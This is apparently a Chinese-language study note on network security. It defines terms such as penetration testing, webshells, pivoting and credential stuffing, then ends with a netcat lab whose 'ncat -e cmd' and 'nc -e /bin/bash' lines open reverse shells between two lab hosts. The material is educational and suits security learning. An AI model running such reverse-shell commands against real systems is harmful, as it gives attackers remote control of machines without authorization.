安全学习（一）

一、有关网络安全名词解释

1. 渗透测试

渗透测试（Penetration Testing，简称 PenTest）是一种计算机安全评估技术，旨在检测应用程序、网络或系统的安全弱点，模拟攻击者的行为，发现潜在的安全漏洞。在进行渗透测试时，测试人员会使用各种技术来模拟攻击，如主动扫描、漏洞利用、社会工程学等。基本流程如下：

明确目标：主要是确定需要渗透资产范围

信息收集：信息收集阶段主要是收集一些基础信息，系统信息，应用信息，版本信息，服务信息，人员信息以及相关防护信息。

漏洞探测（挖掘）：主要是探测（挖掘）系统漏洞，web服务器漏洞，web应用漏洞以及其他端口服务漏洞，如telnet，ssh，vnc，远程桌面连接服务（3389）等

漏洞验证（利用）：漏洞验证主要是利用探测到的漏洞进行攻击，方法主要有自动化验证（msf），手工验证，业务漏洞验证，公开资源的验证等。

2. 漏洞

计算机漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。

3. POC/EXP

POC：全称 ’ Proof of Concept '，中文 ’ 概念验证 ’ ，常指一段漏洞证明的代码。仅用于漏洞的验证，并无较强的攻击效果，并不会给服务器造成损害与资产泄露

EXP：利用系统漏洞进行攻击的动作。具有较强的攻击性，可能会造成服务器端的信息泄露或恶意控制

4. 后门

计算机系统后门，就是信息系统中未公开的通道，在用户未授权的情况下，系统的设计者或其他人可以通过这些通道出入系统而不被用户发觉

5. webshell

是一种恶意脚本，其目的是获得服务器的执行操作权限，比如执行系统命令、窃取用户数据、删除web页面、修改主页等，其危害不言而喻。黑客通常利用常见的漏洞，如SQL注入、远程文件包含(RFI)、FTP，甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分，最终达到控制网站服务器的目的。

6. 木马病毒

隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和共计Dos等特殊功能的后门程序。

7. 反弹/回显

当你拿到了一个权限，你可以将这个权限移植到其他设备，将他反弹过去。

8. 跳板

想入侵C的电脑，但C的电脑只与B的电脑有连接关系，我是A，与B的电脑有连接关系，可通过B连接到C，此时B相当于跳板。

9. 黑白盒子测试

黑盒测试：测试人员在不知道系统的内部工作情况下进行测试工作

白盒测试：测试人员已经了解了系统内部的构造，并清晰地知道系统是如何实现的。 测试人员利用这些知识去开发测试用例，以用来检查控制流，信息流，数据流，异常和错误处理和系统的编码实践等。

10. 暴力破解

用于密码和账户性的爆破，当你不知道对方账户时可以通过暴力破解，跑字典对方他的用户名称进行拆解。

11. 社会工程学

社会工程学是一个通过研究受害者心理，并以此诱使受害者做出配合，从而达到自身目的的学科。黑客米特尼克（Mitnick)在他的作品《反欺骗的艺术》中第一次提到社会工程学，他认为长期以来在网络安全领域中，社会工程学指的就是利用受害者的心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱的手段，一些犯罪分子通过欺骗等手段来谋求利益，这也是网络安全的一大隐患。

12. 撞库

撞库就是网上泄露出来的一些数据库，那么这些数据库中有真实明显和密码等，那么可以通过对数据库的收集查询，去查询有没有这个人，看看他以前设置过什么密码，看看他这个密码到底是什么含义，然后我们再尝试去其他每天以他账户去和密码登录看有没有能成功的。

13. ATT&CK

ATT&CK：（Adversarial Tactics, Techniques, and Common Knowledge）框架是一种用于描述和分类攻击者行为的结构化方法。该框架由MITRE公司开发，旨在帮助安全团队更好地理解和应对威胁行为。

二、nc命令发送权限实验

1. linux监听 5000端口，window发送本地权限

linux端

nc -lvvp 5000

window端

ncat -e cmd 11.0.1.200 5000

linux端

2. window监听5000端口，linux发送本地权限

window端

ncat -lvvp 5000

linux端

nc -e /bin/bash 11.0.1.1 5000

window端